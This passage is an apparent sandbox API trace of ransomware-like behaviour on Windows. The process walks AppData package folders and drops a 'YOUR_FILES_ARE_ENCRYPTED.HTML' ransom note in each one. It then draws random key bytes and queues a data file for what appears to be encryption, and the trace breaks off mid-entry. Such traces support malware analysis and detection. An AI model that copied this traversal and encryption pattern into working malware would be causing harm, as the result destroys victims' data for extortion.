[0119.409] GetProcessHeap () returned 0x600000 [0119.409] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.409] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bcf8c41, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bcf8c41, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bcf8c41, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0119.409] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.409] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache") returned 108 [0119.409] GetProcessHeap () returned 0x600000 [0119.409] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.409] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache" [0119.409] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache\\*" [0119.409] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bcf8c41, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bcf8c41, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bcf8c41, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName=".", cAlternateFileName="")) returned 0x626838 [0119.409] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bcf8c41, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bcf8c41, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bcf8c41, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="..", cAlternateFileName="")) returned 1 [0119.409] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bcf8c41, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bcf8c41, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bcf8c41, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="..", cAlternateFileName="")) returned 0 [0119.409] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0119.409] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 138 [0119.409] GetProcessHeap () returned 0x600000 [0119.409] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.409] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0119.410] WriteFile (in: hFile=0x214, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.411] CloseHandle (hObject=0x214) returned 1 [0119.411] GetProcessHeap () returned 0x600000 [0119.411] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.411] GetProcessHeap () returned 0x600000 [0119.411] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.411] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bcf8c41, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bcf8c41, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bcf8c41, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0119.411] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.411] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState") returned 108 [0119.411] GetProcessHeap () returned 0x600000 [0119.411] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.412] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState" [0119.412] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState\\*" [0119.412] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bcf8c41, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bcf8c41, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bcf8c41, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0119.412] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bcf8c41, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bcf8c41, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bcf8c41, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="..", cAlternateFileName="")) returned 1 [0119.412] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bcf8c41, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bcf8c41, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bcf8c41, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="..", cAlternateFileName="")) returned 0 [0119.412] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0119.412] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 138 [0119.412] GetProcessHeap () returned 0x600000 [0119.412] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.412] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0119.413] WriteFile (in: hFile=0x214, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.413] CloseHandle (hObject=0x214) returned 1 [0119.413] GetProcessHeap () returned 0x600000 [0119.413] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.414] GetProcessHeap () returned 0x600000 [0119.414] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.414] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9420a0c8, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9420a0c8, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9420a0c8, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy", cAlternateFileName="MICROS~1.0_N")) returned 1 [0119.414] StrStrIW (lpFirst="Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.414] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy") returned 177 [0119.414] GetProcessHeap () returned 0x600000 [0119.414] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.414] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy" [0119.414] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\*" [0119.414] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9420a0c8, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9420a0c8, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9420a0c8, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0119.415] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9420a0c8, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9420a0c8, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9420a0c8, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="..", cAlternateFileName="")) returned 1 [0119.415] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9420a0c8, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9420a0c8, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9420a0c8, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0119.415] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.415] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore") returned 193 [0119.415] GetProcessHeap () returned 0x600000 [0119.415] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.415] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore" [0119.415] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*" [0119.415] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9420a0c8, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9420a0c8, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x942565a7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315f070, dwReserved1=0x30f3dc8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0119.417] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9420a0c8, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9420a0c8, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x942565a7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315f070, dwReserved1=0x30f3dc8, cFileName="..", cAlternateFileName="")) returned 1 [0119.417] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9420a0c8, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x945c3bb3, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x945c3bb3, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x315f070, dwReserved1=0x30f3dc8, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0119.417] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.417] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned 213 [0119.417] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0119.417] lstrlenW (lpString=".dat") returned 4 [0119.417] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0119.417] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0119.417] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\microsoft.windows.parentalcontrols_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0119.417] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=16384) returned 1 [0119.417] GetProcessHeap () returned 0x600000 [0119.417] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0119.420] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="0D") returned 2 [0119.420] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="6F") returned 2 [0119.420] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="57") returned 2 [0119.420] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="B9") returned 2 [0119.420] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="CF") returned 2 [0119.420] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="6C") returned 2 [0119.420] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="3B") returned 2 [0119.420] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="11") returned 2 [0119.420] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="38") returned 2 [0119.420] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="31") returned 2 [0119.420] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="6A") returned 2 [0119.420] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="80") returned 2 [0119.420] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="5F") returned 2 [0119.420] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="0A") returned 2 [0119.420] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="AF") returned 2 [0119.420] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="CA") returned 2 [0119.420] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="3B") returned 2 [0119.420] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="85") returned 2 [0119.420] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="A7") returned 2 [0119.420] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="C2") returned 2 [0119.420] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="D9") returned 2 [0119.421] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="02") returned 2 [0119.421] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="5C") returned 2 [0119.421] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="44") returned 2 [0119.421] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="DD") returned 2 [0119.421] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="FA") returned 2 [0119.421] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="CA") returned 2 [0119.421] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="3D") returned 2 [0119.421] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="71") returned 2 [0119.421] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="6A") returned 2 [0119.421] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="CC") returned 2 [0119.421] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="59") returned 2 [0119.421] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" [0119.421] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.421] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0119.421] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x942565a7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x942565a7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x942565a7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x315f070, dwReserved1=0x30f3dc8, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0119.421] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.421] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: 